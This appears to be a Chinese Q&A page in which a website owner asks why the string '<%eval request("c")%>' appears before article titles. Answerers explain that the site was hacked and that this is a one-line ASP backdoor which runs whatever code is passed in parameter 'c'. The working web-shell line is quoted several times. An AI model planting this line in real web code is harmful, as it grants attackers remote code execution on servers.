<%eval request("c")%>- 是什么东西,为什么我的网站更新完后台文章以后,就会生成这个代码?
我网站更新完后台以后文章前面就会生成这个代码是怎么回事呢?例如<%evalrequest("c")%>-标题...
我网站更新完后台以后文章前面就会生成这个代码是怎么回事呢? 例如<%eval request("c")%>- 标题
展开
2个回答
展开全部
被黑了呗, eval是个执行函数,可以执行URL参数(或表单参数)c的内容,如果c的值是有破坏性的(比如删除数据库所有数据),这个后果,你懂的.
追问
怎么查询到网站这个木马在哪? 我防火墙和杀毒没有有木马啊?
追答
我并没有说这是个木马啊, 换句话说, 这只是被人在你的ASP文件里留了后门代码, 如果你要说木马, 那这行代码也可以算作是木马了. 实际上是Eval函数可以将一段字符串按当前语言解释执行,这个函数本身并不危险,危险的是你不能允许别人通过互联网直接调用该函数. 所以杀软没有警告也是正常的,就好比format命令,其实很有用,但你不能让别人在你服务器上执行一样.
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
哥!你中了木马了。。。。这是一句话木马!!
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
